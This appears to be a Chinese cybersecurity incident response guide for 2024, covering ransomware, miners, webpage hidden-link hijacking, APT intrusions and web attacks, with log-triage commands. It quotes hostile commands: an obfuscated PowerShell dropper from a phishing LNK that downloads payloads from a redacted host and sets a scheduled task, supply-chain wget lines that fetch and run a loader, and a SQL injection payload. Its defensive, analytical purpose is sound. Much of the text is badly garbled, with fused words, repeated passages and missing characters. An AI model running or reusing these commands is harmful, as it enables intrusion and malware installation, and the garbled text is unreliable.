2024網(wǎng)絡(luò)安全事件應(yīng)急指南

2024年網(wǎng)絡(luò)安全事件應(yīng)急指南EmergencyGuidelinesforCybersecurityIncidents數(shù)據(jù)泄露場景 01背景簡介 某用戶重要業(yè)務(wù)數(shù)據(jù)在暗網(wǎng)論壇被售賣事件 某單位因敏感數(shù)據(jù)泄露被通報事件 勒索場景 06背景簡介 處置與溯源流程 phobos勒索家族通過RDP端口暴破入侵事件 mallox勒索家族通過Web應(yīng)用漏洞入侵事件 mallox勒索家族通過MSSQL端口暴破入侵+內(nèi)網(wǎng)橫向事件 勒索軟件的防御措施 主機(jī)病毒場景 18背景簡介 Linux系統(tǒng)主機(jī)病毒案例 PwnDNS挖礦軟件一度風(fēng)靡的惡意軟 Mirai僵尸網(wǎng)絡(luò)家族活躍時間最長的網(wǎng)絡(luò)威 Windows系統(tǒng)主機(jī)病毒案例 “麻辣香鍋病毒劫持萬千用戶瀏覽器主頁的病 主機(jī)病毒的應(yīng)對策略 網(wǎng)頁暗鏈場景 33背景簡介 處置與溯源流程 某服務(wù)行業(yè)用戶「IIS惡意模塊+UA頭部劫持植入暗鏈被通報 某媒體行業(yè)用戶「Nginx配置文件劫持 靜態(tài)html網(wǎng)頁暗鏈的防御措施 APT場 背景簡介 某單位遭遇海蓮花惡意IP攻擊被通報 某科研機(jī)構(gòu)遭遇白象郵件釣魚攻擊 某單位遭遇境外NSA武器滲透攻擊 Web入侵場 背景簡介 處置與溯源流程 某企業(yè)用戶業(yè)務(wù)服務(wù)器內(nèi)存馬注入事件 某用戶財務(wù)系統(tǒng)SQL注入事件 附錄2023-2024大型網(wǎng)絡(luò)安全事件盤 基礎(chǔ)設(shè)施行業(yè) 能源制造業(yè) 政府機(jī)構(gòu) 01010202數(shù)據(jù)Web攻擊、個人行為、拍照、截圖、U數(shù)據(jù)本章節(jié)，我們將從Web方向分析數(shù)據(jù)泄露的可能性，以及如何利用現(xiàn)有的日志進(jìn)行綜合分析以應(yīng)對數(shù)據(jù)泄露事件。在Web方向最經(jīng)常遇到的數(shù)據(jù)泄露事件有兩種：一種是已知泄露數(shù)據(jù)源，類似下文案例分析中某樣板數(shù)據(jù)被公布在了暗網(wǎng)或各大平臺上，這時我們可以通過已知的線索作為定位點進(jìn)行綜合分析，利用數(shù)據(jù)產(chǎn)生的時間和事發(fā)時間進(jìn)而定位出攻擊時間范圍進(jìn)行精準(zhǔn)溯源。另外一種情況是更加嚴(yán)重的，即收到監(jiān)管單位通報說某個單位存在數(shù)據(jù)泄露情況，但給出的信息較少，不足以支撐后續(xù)定點分析（一種是已知泄露數(shù)據(jù)源，類似下文案例分析中某樣板數(shù)據(jù)被公布在了暗網(wǎng)或各大平臺上，這時我們可以通過已知的線索作為定位點進(jìn)行綜合分析，利用數(shù)據(jù)產(chǎn)生的時間和事發(fā)時間進(jìn)而定位出攻擊時間范圍進(jìn)行精準(zhǔn)溯源。另外一種情況是更加嚴(yán)重的，即收到監(jiān)管單位通報說某個單位存在數(shù)據(jù)泄露情況，但給出的信息較少，不足以支撐后續(xù)定點分析（IP。Web追蹤數(shù)據(jù)泄露的源頭，并采取相應(yīng)的補(bǔ)救措施。在實際應(yīng)用中，這種方法不僅有助于理解數(shù)據(jù)泄露的過程，還能為未來的安全防護(hù)提供有價值的參考。事件概要某用戶通過相關(guān)情報得知，自身重要業(yè)務(wù)數(shù)據(jù)被黑客在暗網(wǎng)論壇上售賣，應(yīng)急響應(yīng)中心應(yīng)用戶要求對本次事件進(jìn)行深入分析。根據(jù)黑客發(fā)布的信息以及鏈接中的數(shù)據(jù)初步判斷該數(shù)據(jù)格式和某業(yè)務(wù)系統(tǒng)中的導(dǎo)出功能相似，由于該系統(tǒng)本身支持導(dǎo)出功能所以推測該系統(tǒng)被攻擊的方式存在以下幾種可能性：WebWebWebshellWebshell前期得知該服務(wù)器曾被其他安全團(tuán)隊分析過，并未發(fā)現(xiàn)被攻擊痕跡且用戶已將業(yè)務(wù)系統(tǒng)關(guān)閉并收斂到了內(nèi)網(wǎng)，故公網(wǎng)無法得知相關(guān)情況。經(jīng)溝通用戶同意將服務(wù)器拷貝一份給到應(yīng)急響應(yīng)中心分析。109事件分析方案IPIPua人工猜測可能存在的接口信息并根據(jù)關(guān)鍵字段搜索，關(guān)鍵信息例如：xlsx、filename、Export等凡是與07070808>2MSSQLRDPWeb的前端WebRDPWebMSSQLWeb應(yīng)用漏洞入侵，（7步處理。梳理每臺全磁盤加密終端的加密時間前的RDP連接相關(guān)日志，如Security.evtx（事件ID4624）、Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx（事件ID1149）和Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx（事件ID21、25），篩選事件ID并根據(jù)連接成功的IP逐級向上收斂即可溯源到內(nèi)網(wǎng)的失陷源頭終端，從而確定攻擊IP，參考案例1（phobos勒索家族RDP端口暴破入侵xp_cmdshellclrenbale（ID18456）。MSSQLWebSQL注入漏洞導(dǎo)致，梳理被加密終端的enbale的痕跡。其它情況則根據(jù)被加密終端對外開放的Web應(yīng)用，進(jìn)行Webshell查殺和加密時間前的Web日志（訪問日志和報錯日志等）2（malloxWeb應(yīng)用漏洞入侵。45MSSQLRDP證后橫向RDP訪問內(nèi)網(wǎng)其它終端，無法通過簡單的數(shù)量統(tǒng)計來判斷入侵方式，但是溯源的辦法是通用的，針對不同情況逐級向上溯源最終都可定位到內(nèi)網(wǎng)源頭終端，參考案例3（mallox勒索家族MSSQL端口暴破入侵+RDPSAFT0909phobosphobosRDP應(yīng)急響應(yīng)中心接到某媒體行業(yè)用戶反饋，其服務(wù)器文件出現(xiàn)被加密情況，初步統(tǒng)計被加密服務(wù)器10臺以上，用戶已進(jìn)行加密后綴為svh，根據(jù)勒索信內(nèi)容和后綴可確定來源為phobos勒索家族，因為存在多臺被完全加密的服務(wù)器，可初步判RDP通過查看當(dāng)前終端的RDP連接相關(guān)日志Microsoft-Windows-TerminalServices-LocalSessionManager%4Opera-RDP登錄記錄，可初步判斷為上層攻擊IP（下圖為自研的勒索溯源工具的溯源結(jié)果截圖，windows自帶的事件查看器也繼續(xù)排查129.*.*.98的RDP連接日志，查看Microsoft-Windows-TerminalServices-LocalSessionManager%4Opera-RDP登錄記錄，可初步判斷為上層攻擊IP（下圖為自研的勒索溯源工具截圖，windows自帶的事件查看器也可查看相關(guān)RDP129.*.*.198，因篇幅原因，這里不進(jìn)行一一列舉。至129.*.*.198RDPRDPmalloxmalloxWeb應(yīng)急響應(yīng)中心接到某媒體行業(yè)用戶反饋，有1臺MSSQL數(shù)據(jù)庫服務(wù)器文件被加密，用戶已進(jìn)行斷網(wǎng)處理，收集的勒索信rmallox，malloxMSSQL1Web應(yīng)用服務(wù)器（OA）WebSQLMSSQLApplication.evtx，ID15457加密時間前存在開啟xp_cmdshell功能的日志，且不存在大量暴破MSSQL端口失敗的日志，進(jìn)一步確認(rèn)為SQL注入漏根據(jù)開啟xp_cmdshell的時間點查看前端Web應(yīng)用的報錯日志，在報錯日志中發(fā)現(xiàn)注入的SQL語句，作用為使用xp_cmdshell195.*.*.35postVPSmalloxpost另外在相同時間點（IIS的日志因時區(qū)原因默認(rèn)需要+8才為正確時間）的訪問日志中記錄了存在SQL注入漏洞的接口 經(jīng)過與漏洞情報匹配，確認(rèn)為某OA的AjaxSendDingdingMessage接口的SQL注入漏洞，至此可確定黑客通過某OA的AjaxSendDingdingMessageSQLmalloxmalloxMSSQL3（1MSSQL）文件被加密，用戶已進(jìn)行斷網(wǎng)處理。因為可確定僅數(shù)據(jù)庫業(yè)務(wù)對外，基本可以判斷為MSSQL數(shù)據(jù)庫端口暴破入侵直接對數(shù)據(jù)庫服務(wù)器rmallox，malloxMSSQLID18456日志可發(fā)現(xiàn)加密時間前存在大量數(shù)據(jù)庫用戶登錄失敗日志，說明MSSQL因為存在大量暴破失敗的日志，Application.evtx222時間之前就已經(jīng)入侵服務(wù)器。繼續(xù)通過everything工具搜索ps1后綴文件，發(fā)現(xiàn)被加密時間前MSSQL目錄下存在異常的ps1文件，內(nèi)容為遠(yuǎn)程下載一個exe程序，雖然exe文件已經(jīng)自刪除，但是通過這個手法大概率已經(jīng)可以確定為malloxeverythingexe29AnydeskSystem.evtxID7045Anydesk29233038即符合前面2月22日前已經(jīng)入侵服務(wù)器的判斷，可以確定MSSQL數(shù)據(jù)庫服務(wù)器就是本次事件的內(nèi)網(wǎng)源頭主機(jī)，那么另MSSQLNAS21032MSSQL100.*.*.93SSHSSH橫向攻擊的判斷。通過查看另外1臺服務(wù)器的Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx日志，212100.*.*.93RDPRDP212RDPAnydeskRDP2windowsAnydeskRDPMSSQLIP禁止使用弱口令12RDP通過對近幾年所處理勒索事件進(jìn)行根因分析，應(yīng)急響應(yīng)中心總結(jié)并沉淀了針對RDP和MSSQL失陷導(dǎo)致勒索的預(yù)防檢測工具“RansomGuard（因篇幅原因，這里僅展示部分內(nèi)容主機(jī)主機(jī)病毒是一種專門針對主機(jī)系統(tǒng)中的資源進(jìn)行攻擊的惡意軟件，通過修改系統(tǒng)文件、破壞數(shù)據(jù)、竊取信息或使系統(tǒng)性能下降等方式對計算機(jī)造成損害，它們可以通過各種途徑傳播，如存儲介質(zhì)、網(wǎng)絡(luò)和軟件下載，對個人和企業(yè)的數(shù)據(jù)安全都主機(jī)在此，我們分別選取Linux和Windows這兩個較為主流且使用廣泛的操作系統(tǒng)平臺中，具有實時熱點、活躍較久、有明Linux系統(tǒng)主機(jī)病毒案例Linux系統(tǒng)主機(jī)病毒案例PwnDNS挖礦軟件：一度風(fēng)靡的惡意軟件PwnDNSLinux重的負(fù)面影響。一旦主機(jī)被感染，PwnDNS挖礦軟件會大量消耗系統(tǒng)資源，導(dǎo)致主機(jī)性能顯著下降，嚴(yán)重影響業(yè)務(wù)運行和主要特點PwnDNSPwnDNSCPU和維護(hù)；病毒會偽裝成常見的系統(tǒng)進(jìn)程或服務(wù)，使其難以被用戶和安全軟件識別。影響范圍事件處置分析過程應(yīng)急響應(yīng)中心接到某單位用戶反饋，有一個對外發(fā)布設(shè)備突然響應(yīng)很慢，通過監(jiān)控設(shè)施發(fā)現(xiàn)主機(jī)的資源使用嚴(yán)重超載，我們的安全分析人員協(xié)助該用戶對出現(xiàn)問題的業(yè)務(wù)進(jìn)行處置溯源。sshPwnDNS挖礦軟件在運行過程中過載使用主機(jī)資源?？焖僮R別病毒特征*PwnDNS挖礦家族等病毒的特征，包括其釋放的文件和篡挖掘隱藏配置*全面掃描病毒程序*精準(zhǔn)識別病毒進(jìn)程*****自動化清除病毒**自動化清除病毒**實時監(jiān)控系統(tǒng)狀態(tài)*工具使用過程示意Linux“MMHpidMiraiLinux主要特點影響范圍DDoS事件處置分析過程C2kill我們的安全分析人員確認(rèn)該需求之后上機(jī)便直接通過MMH應(yīng)急響應(yīng)工具進(jìn)行掃描，發(fā)現(xiàn)很多進(jìn)程通過mount掛載的方WindowsWindowsWindws于技術(shù)愛好者還是普通網(wǎng)民，瀏覽器主頁被篡改都是普遍存在的問題。試想一下，當(dāng)自己打開電腦運行瀏覽器的時候，突然眼前一花，瀏覽器頁面跳轉(zhuǎn)到一些各種彈窗，一刀9999，小游戲廣告等內(nèi)容的網(wǎng)站，這不僅影響了用戶的上網(wǎng)體驗，將用戶瀏覽器主頁更改，用這樣的方式進(jìn)行廣告引流、信息推廣等，從而獲取利益。主要特點用戶嘗試手動恢復(fù)主頁設(shè)置無效，或者開啟瀏覽器時，自動跳轉(zhuǎn)至非預(yù)期的網(wǎng)頁，通常是廣告或推廣性質(zhì)的站點。用戶嘗試手動恢復(fù)主頁設(shè)置無效，或者開啟瀏覽器時，自動跳轉(zhuǎn)至非預(yù)期的網(wǎng)頁，通常是廣告或推廣性質(zhì)的站點。主要通過各種激活工具（如KMS、小馬激活）注冊虛假的系統(tǒng)服務(wù)（WindowsMobileUserExperienceServer）來掩蓋其真實目的；病毒運行機(jī)制KMDFKMDFdump影響范圍Wndws操作系活系統(tǒng)，工具中如果夾帶了不安全的代碼就會在主機(jī)激活的時候執(zhí)行惡意操作。事件處置過程分析應(yīng)急響應(yīng)中心接到某媒體單位用戶反饋，幾臺新裝的主機(jī)突然中了病毒，每次打開瀏覽器都會打開一個游戲推廣網(wǎng)站，安裝殺軟殺毒也沒用，用戶自己重新設(shè)置了瀏覽器默認(rèn)頁面的地址也沒有生效，用戶的需求是分析出事件原因，并幫他們還原原本的瀏覽器首頁。通過調(diào)用類似事件的處置經(jīng)驗，我們在給用戶檢查主機(jī)時發(fā)現(xiàn)在下載目錄中有一個baofeng.exe的可執(zhí)行程序文件，問詢Windows打開瀏覽器后，瀏覽器主頁已經(jīng)跳轉(zhuǎn)到一個推廣網(wǎng)站，在這里已經(jīng)確認(rèn)是激活工具的問題了，那么接下來需要對主機(jī)進(jìn)行深入檢查，找到被篡改的地方再進(jìn)行還原。排查發(fā)現(xiàn)兩個未知文件并以windowsPCHunterC:\users\\AppData\Local\Microsoft\EventViewer，（如沒有清windows）C:\users\\AppData\Local\tempc:\windows\system32\driversIDAMRK_Rootkit此工具具備以下功能Mlxg_kmMlxg_km工具使用過程示意“MRK_RootkitMRKLog.log掌握傳播方式：掌握傳播方式：快速產(chǎn)出專殺規(guī)則：基于詳細(xì)的病毒行為分析，快速開發(fā)出針對性的專殺規(guī)則，確保專殺工具能夠覆蓋多種感染場景。覆蓋多種場景：通過上述應(yīng)對策略，不僅能夠快速識別和處置主機(jī)類病毒，還能從根源上防止病毒的再次傳播。希望這些策略建議能夠為用戶提供更加全面和有效的安全保障。網(wǎng)頁Javascript網(wǎng)頁常用劫持手法JSJSUANginxnginxnginxIIS靜態(tài)htmlhtmlSEOIISJSJS（nginxapacheIIS和webSphere等F12burpsuiteCMSCMSbaidu、sogou、bing、googleIPhoneIPad（可編碼混淆等等。IIS+UANginx2（Nginxhtml。JShtml將前面步驟排查出來的可疑代碼或者文件刪除，使用終端防護(hù)軟件或者其它Webshell查殺工具對Web將前面步驟排查出來的可疑代碼或者文件刪除，使用終端防護(hù)軟件或者其它Webshell查殺工具對WebWebshellWebshellWebCMS2024年4月，某服務(wù)行業(yè)用戶反饋被監(jiān)管單位通報存在暗鏈，根據(jù)通報內(nèi)容，通過搜索引擎檢索主站關(guān)鍵字確認(rèn)出現(xiàn)與Web應(yīng)用服務(wù)器為一個大的IISXXX點擊存在暗鏈的搜索結(jié)果，通過測試，當(dāng)UA頭部為搜索引擎UA頭部會出現(xiàn)跳轉(zhuǎn)現(xiàn)象，而正常的PC瀏覽器直接訪問暗ScriptModules-2.0dllt.dll。dllIISCMS后臺無異常日志，無法進(jìn)行下一步溯源工作。2024年5月，應(yīng)急響應(yīng)中心接到某媒體行業(yè)用戶反饋多次被監(jiān)管單位通報存在暗鏈，在開始排查原因前，我們先查看了nginx“/yule”url183.*.*.4081nginxUA頭部判斷，對于符合規(guī)則的urlUAUA404但是因為服務(wù)器上沒有落地Webshell且為純靜態(tài)資源的nginx服務(wù)器，排除Web漏洞失陷的可能，根據(jù)服務(wù)器僅開放SSHSSH口令泄露導(dǎo)致的失陷，未能定位準(zhǔn)確的失陷入口點。再來看這次的通報，訪問通報中的暗鏈鏈接，確認(rèn)為暗鏈相關(guān)的內(nèi)容，經(jīng)過用戶確認(rèn)，該頁面文件與正常頁面的名稱和內(nèi)容相似，初步判斷為靜態(tài)頁面劫持。5282233wget01.ziphtmcrondwgetcrondSSHcrond3151505crondlibxml2.so.2.9.2，crondUDP通信隧道，用installlibxml2.so.2.9.2amdc6766定多次的網(wǎng)頁黑鏈?zhǔn)录紴閍mdc6766組織所為，因時間已經(jīng)過去2個多月，服務(wù)器上日志存在覆蓋，未能確認(rèn)異常程序install是如何落地的。但是結(jié)合威脅情報，推測為供應(yīng)鏈攻擊投毒導(dǎo)致，amdc6766組織在2023至2024年，對PHP/JAVA部署工具OneinStack和環(huán)境部署工具LNMP的官網(wǎng)實施了攻擊，并在官網(wǎng)上下載的安裝包內(nèi)植入惡意鏈接，20234wget\h/onein-stack.jpg-cO/var/local/oneinstack.jpg\tarzxf/var/local/oneinstack.jpgC/var/local/./load20234wget\hhttp://I/Inmp.jpg-tarzxf/var/local/Inmp.jpg-C/var/local/cd/var/local/cron\./load20239../tools/inmp.sh202310/src/pcre-\hnstack.club/osk.jpg-cO/var/locatarzxf/var/local/osk.jpg-C/var/local/>/dev/nullamdc6766amdc6766部署網(wǎng)站防篡改系統(tǒng)，對網(wǎng)頁文件進(jìn)行實時檢測、防護(hù)和恢復(fù)，同時做好備份網(wǎng)站源代碼的工作，并定期比對網(wǎng)站文件是否與備份文件一致。加強(qiáng)邊界側(cè)的防護(hù)能力，部署網(wǎng)站防篡改系統(tǒng)，對網(wǎng)頁文件進(jìn)行實時檢測、防護(hù)和恢復(fù)，同時做好備份網(wǎng)站源代碼的工作，并定期比對網(wǎng)站文件是否與備份文件一致。加強(qiáng)邊界側(cè)的防護(hù)能力，WAF部署終端防護(hù)軟件，APT（AdvancedPersistentThreat，高級持續(xù)性威脅）是一種蓄謀已久的“間諜行為”，它一般是由國家背景的組織或團(tuán)隊發(fā)起，有計劃性和組織性，針對特定對象，開展長期、隱蔽和復(fù)雜的攻擊，以竊取核心資料為目的。APT攻擊通常利用3APT某單位遭遇海蓮花惡意IP某單位遭遇海蓮花惡意IP背景介紹海蓮花（OceanLotus）20124APT某單位被通報存在惡意IP通信，懷疑內(nèi)部可能被APT32（海蓮花）組織控制，需要對終端、服務(wù)器等設(shè)備進(jìn)行排查并確應(yīng)急響應(yīng)過程分析C2注：這里有一個細(xì)節(jié)需要注意，在應(yīng)急響應(yīng)過程中我們可能盡可能的將全面流量進(jìn)行排查，不僅僅局限于排查惡意或已被C2SIPfree結(jié)合多次處置海蓮花APT的經(jīng)驗來看，該組織可能使用了白加黑惡意程序作為后門，在調(diào)用黑程序的時候黑程序?qū)vchostsvchost。對此情況可以使用應(yīng)急響應(yīng)中心自研的專殺工具（此工具目前已升級為“MR_tkit”自動化專殺工具）對磁盤文件進(jìn)行規(guī)則搜索，最終搜索結(jié)果發(fā)現(xiàn)存在一處可疑的文件。2021102116找到文件后需要進(jìn)一步排查，是否存在維權(quán)此類情況（APT操作系統(tǒng)日志被清理在操作系統(tǒng)日志中無法找到痕跡，所以需要借助相關(guān)設(shè)備。3389**.**.15.5915：00~16：00150338915.59RDP15015.59IPC、338921.915.59445，IPC21.91018SIP0.7521.95900，可以知道5900VNC0.75，VNC21.944515.59，并利用RDP15015021.9背景介紹chork（）2013NormanATchorkVBA功率，chork應(yīng)急響應(yīng)過程分析送給目標(biāo)人員。LNKC:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exepowershell$ProgressPreference='SilentlyContinue';$b='C:\Us-ers';iw''rhttp://https://**.**.com/ae687htr/qazswi97-OutFile$b\Public\resume.pdf;s''a''p''s$b\Pub-202410271732pythondllpython312.dll。執(zhí)行程序后，惡意程序?qū)谌蝿?wù)計劃中創(chuàng)建計劃任務(wù)Edgeupdates樣本分析-Path"$b\Public\tim"-NewName"$b\Public\pythonw.exe.exe";iw''rhttp://https://**.**.com/ae687htr/16hrvh5-OutFile"$b\Public\hen";r''e''n-Path"$b\Public\hen"-NewName"$b\Public\python312.dll";c''p''i"$b\Public\resume.pdf"-destination.;sch''ta''s''ks/c''r''e''a''te/S''cC:\Windows\System32\conhost.exepowershell$ProgressPreference='SilentlyContinue';$b='C:\Users';iw''rhttp://https://**.**.com/ae687htr/qazswi97-OutFile$b\Public\resume.pdf;s''a''p''s$b\Public\resume.pdf;iw''rhttp://C:\Users\Publicpythonw.exe.exepythonw.exe.exepythonpython312.dll(python312.dllhttps://**.**.com背景介紹美國國家安全局領(lǐng)導(dǎo)下的TAO（國內(nèi)將其命名為：特定入侵行動辦公室）對國內(nèi)某單位進(jìn)行了定點攻擊，并對我國國內(nèi)的事件過程為：20**4應(yīng)急響應(yīng)過程分析TAO（特定入侵行動辦公室）利用掌握的SunOS0dayNOPENTAO邊利用被控制服務(wù)器作為跳板機(jī)將輸入的指令利用被控IP\h正常HTTP\h0dayHTTP/1.1200Pragma:no-cacheCache-Control:no-cache,no-<htm!><metahttp-equiy="refresh"content="0"><body,(iframe\hheight="1"width="1"scrolling="no"frameborder="0"marginheight="0"HTTP/1.1_200Server:Microsoft-Content-Length:25HTTP/1.1302\h二次約會中間人劫持工具可以偽造返回包，該數(shù)據(jù)包比網(wǎng)站正常數(shù)據(jù)包提前到達(dá)用戶主機(jī)，并在返回包中插入例如\h獲取權(quán)限后，TAO組織會利用“飲茶”嗅探工具對該主機(jī)的運維管理服務(wù)器登錄賬戶密碼進(jìn)行嗅探，其中包括輸入的ssh、telnetFtp結(jié)論美國NSA的APT美國NSA的APTAPT0dayNSA的目標(biāo)是全球作戰(zhàn)，就像美軍基地和航母戰(zhàn)斗群一樣，可以打擊全球美國NSA在外圍打點方面與其他APT組織不同0day0dayWebAPT根據(jù)以往的分析報告顯示，同一種的木馬可能就有幾十個版本。在2017年“影子經(jīng)紀(jì)人”泄露了美國NSA“方程美國NSA在一次APT攻擊事件前期，會做大量的準(zhǔn)備工作，包括匿名購買域名及服務(wù)器，甚至?xí)ｉT成立公司去0dayToast（吐司面包LinuxutmpwtmplastlogLinuxSolarisJunOSFreeBSDsetuid文件將登錄用戶身份提至root，針對的操作系統(tǒng)為基于x86架構(gòu)或SparcSolaris611。Enemyrun（敵后行動Solaris系統(tǒng)的密碼嗅探工具，通過嗅探進(jìn)程間通信的方式獲取ssh、telnetrloginSuctionchar（飲茶SparcSolaris611。Ebbshave（剃須刀可觸發(fā)SolarisXDR代碼中的緩沖區(qū)溢出漏洞，從而獲得shell，若配合EXTREMEPARR，可遠(yuǎn)程獲得rootshell，針對的操作系統(tǒng)為基于x86架構(gòu)或SparcSolaris611。Ebbisland（孤島BADDECISIONNSApayload。Unix/LinuxDanderSpritz（怒火噴射DanderSpritzWindwsLinuWinswin7winserer2008/2003/2000。以上攻擊工具針對的系統(tǒng)范圍如下CentOS[4.4,Ubuntu[8.04,AIX[5.1,HpuxSolaris[2.6,SunOS[5.8,MandrivaMandrakeRedHat7.0-7.1SendmailMDaemonemailWDaemon/IISMDaemon/WorldClientpreIBMLotusDomino6.5.4toIMail8.10toIISWeb入侵是指攻擊者通過利用Web應(yīng)用程序的漏洞或配置不當(dāng)?shù)陌踩珯C(jī)制，獲得未經(jīng)授權(quán)的訪問權(quán)限，操縱、破壞系統(tǒng)或竊取敏感信息。隨著互聯(lián)網(wǎng)技術(shù)的快速發(fā)展，Web應(yīng)用已經(jīng)成為許多企業(yè)核心業(yè)務(wù)的基礎(chǔ)，因此Web入侵攻擊也愈加Web漏洞利用：SQL漏洞利用：SQLRCE錯誤配置和弱密碼：不當(dāng)?shù)南到y(tǒng)配置、使用默認(rèn)賬戶和密碼、缺乏安全加固等因素，都可能成為攻擊者入侵的切入點。社會工程攻擊：CSRF利用大幅增加了攻擊的復(fù)雜性和成功的可能性，使得防御方的檢測與響應(yīng)變得更加困難。攻擊方式SQL注入SQL注入主要由于應(yīng)用程序?qū)τ脩糨斎霙]有進(jìn)行合法性校驗或過濾不嚴(yán)，導(dǎo)致攻擊者可以在正常業(yè)務(wù)的查詢語句后添加額SQLSQLformid=1'+(SELECTformid=1'+(SELECTEWHERE1=1AND1IN(SELECT(^+(SELECTSUBSTRING((ISNULL(CAST(DB_NAME()ASNVARCHAR(4000)),SQLSQL如用于閉合的'、"、(、)、;等字符，以及它們的URL編碼形式%27、%22、%28、%29、%3b等；如連接字符空格、加號+，以及它們的URL%20、%2b；和函數(shù)from、count、orderby、groupby、concat、rand等，基于時間盲注相關(guān)的函數(shù)sleep，以及報錯注入函數(shù)updatexml、extractvalue文件上傳WebShell比如沒有進(jìn)行過任何校驗和過濾的上傳接口，可以直接上傳WebShell由于上傳功能屬于正常的功能組件，無論是直接或者間接進(jìn)行文件處理，如果沒有對上傳的文件進(jìn)行有效的安全過濾，就會導(dǎo)致安全風(fēng)險，因此我們需要對文件的合法性進(jìn)行校驗。php、jsp、asx等可執(zhí)行文件，以及常見的后綴變形；php5、pHp、pphphpMIME本執(zhí)行；反序列化反序列化是發(fā)生在應(yīng)用程序在處理序列化和反序列化數(shù)據(jù)的過程中，攻擊者構(gòu)造了惡意的序列化數(shù)據(jù)，在Java、PHP、PythonJavaObjectInputStreamjava.lang.RuntimeJson、XML模板注入模板注入是在應(yīng)用程序使用如Jinja2、Twig等模板引擎來生成動態(tài)內(nèi)容時，未對用戶輸入進(jìn)行校驗并直接傳遞給模板進(jìn)OAHTML生成、電子郵件輸出等，屬于框架內(nèi)置功能，因此需要對輸入與渲染進(jìn)行過濾。雖然能夠獲取權(quán)限的漏洞有多種，但最終的目的都是為了寫入WebShell或者寫入內(nèi)存馬來對服務(wù)器進(jìn)行控制，只要把握Web一是確認(rèn)入侵時間范圍，以此為線索，排查對應(yīng)時間范圍的可疑日志，再進(jìn)一步排查日志對應(yīng)的操作，來還原攻擊過程。二是在攻擊者入侵之后，通常會留下后門維持權(quán)限，以便再次訪問，可以以文件為線索，再根據(jù)對應(yīng)日志來還原攻擊過程。一是確認(rèn)入侵時間范圍，以此為線索，排查對應(yīng)時間范圍的可疑日志，再進(jìn)一步排查日志對應(yīng)的操作，來還原攻擊過程。二是在攻擊者入侵之后，通常會留下后門維持權(quán)限，以便再次訪問，可以以文件為線索，再根據(jù)對應(yīng)日志來還原攻擊過程。WebShellIP、網(wǎng)段、HTTPURLIPgrepgrep'23/May/2019'/www/logs/access.2019-02-23.log|awk'{print$1}'|awk-F'.'catcat/www/logs/access.2019-02-23.log|awk'{print$1}'|awk-F'.''{print$1"."$2"."$3".0"}'|sort|uniq-c|sort-r-n|head-n200catcat/www/logs/access.2019-02-23.log|awk'{print$2}'|sort|uniq-c|sort-HTTP請求狀態(tài)catcat/www/logs/access.2019-02-23.log|awk'{print$9}'|sort|uniq-c|sort-URLcatcat/www/logs/access.2019-02-23.log|awk'{print$7}'|sort|uniq-c|sort-catcat/www/logs/access.2019-02-23.log|awk'{sum[$7]+=$10}END{for(iinsum){print-rn|moregrep'200'/www/logs/access.2019-02-23.log|awk'{sum[$7]+=$10}END{for(iinsum){printsum[i],i}}'|sort-rn|moreURLcatcat/www/logs/access.2019-02-23.log|awk'{print$7}'|egrep'\?|&'|sort|uniq-c|sort-rn|IPcatcat/www/logs/access.2019-02-23.log|awk'{print$7}'|egrep'\?|&'|sort|uniq-c|sort-rn|sort-n-k1-r|uniq>/tmp/slow_url.txt24findfind./-mtime0-namelsls-al/www|grep"Feblsls-alt/www|head-nstatstat內(nèi)存馬對于內(nèi)存馬的排查，首先判斷是通過什么方法注入的內(nèi)存馬，先從對應(yīng)日志中篩選可疑的請求，如果是filter或者listenerURL請求相同，但參數(shù)不同的請求日志，并且查看是否有哥斯拉、冰蝎等工具的流量特征；200URL200如果未在Web日志中發(fā)現(xiàn)異常，則排查是否為中間件漏洞導(dǎo)致的代碼執(zhí)行，根據(jù)所使用的業(yè)務(wù)組件，查看是否存在已公背景介紹某企業(yè)用戶通過相關(guān)情報得知，Web分析過程如下對外僅映射WEBRDPRDP用Web相關(guān)漏洞得到主機(jī)權(quán)限。WebWeb相關(guān)漏洞，優(yōu)先使用流量設(shè)備進(jìn)行分析，然而通常由于條件所限（https業(yè)務(wù)主機(jī)等情況）（access）已經(jīng)提及“攻擊者得到主機(jī)權(quán)限”，我們則優(yōu)先在本機(jī)檢索是否落地有效惡意文件和流量日志中是否存在Webshell/(WebshellWebshellGETPOST若通過上一點得到有效接口，我們在能得到源碼情況下，可對接口進(jìn)行代碼審計，明確問題點，提出針對性加固建議。事件溯源分析過程Webaccess根據(jù)"思路"中的方法進(jìn)行實踐，在第一種方法時就發(fā)現(xiàn)明顯異常：b)23/Jul/2024:13:44:02，resource,200，說明該資源存在。通過深信服應(yīng)急響應(yīng)工具庫中的內(nèi)存馬掃描工具（MSI）進(jìn)行內(nèi)存馬掃描，為accesss日志分析提供佐證，該工具會將內(nèi)classresult(23/Jul/2024:13:4x)，POST23/Jul/2024:13:43:51，"xxx_config.jsp（）23/Jul/2024:13:43:53，"/login_single_horizontal_config.jsp"。所以攻擊者使用tal_config.jspresource/"，被攻擊者用于后續(xù)控制。處置方式地的文件接口"*_configjsp"、內(nèi)存馬接口"/resource"接口使用防火墻進(jìn)行禁用(該方式不影響相關(guān)進(jìn)程外聯(lián)IP是否為惡意(排查的進(jìn)程連接海外I查的白進(jìn)程外聯(lián)情報可疑IP)的糾結(jié)中。MRK_HW事件結(jié)論針對高危組件，因為攻擊者一般已獲得源碼，當(dāng)攻防演練開始時，常通過0day漏洞展開攻擊，得到入口點機(jī)器作為代理AF某用戶財務(wù)系統(tǒng)SQL某用戶財務(wù)系統(tǒng)SQL背景介紹分析過程如下xp_cmdshell首先了解涉事主機(jī)網(wǎng)絡(luò)情況和通過用戶提供線索和對網(wǎng)絡(luò)情況進(jìn)行分析：a）對外僅映射WEB"b）SQL由此推斷可能存在以下兩種情況：財務(wù)服務(wù)器本身存在SQL注入漏洞起SQL"財務(wù)系統(tǒng)"發(fā)起帶惡意SQL語Mssql（經(jīng)查看也確實沒有開啟）SQLaccess/axis2Web()行代碼審計，明確問題點，提出針對性加固建議。溯源分析過程存在大量訪問“/services/operOriztion”接口情況，且其中一條urI明顯存在SQL語句"ANDUNIONSELECT"，符合SQL“/services/operOriztion”“axis”SoapUI\h進(jìn)每個參數(shù)里，逐個黑盒測試，即可得到SQL注入漏洞參數(shù)點。由此得到，該漏洞為“/services/operOriztion”接口，且未對“kjnd”SQLclasses/com/ufgov/midas/pt/service/OperOriztion.classgetGsbmfaB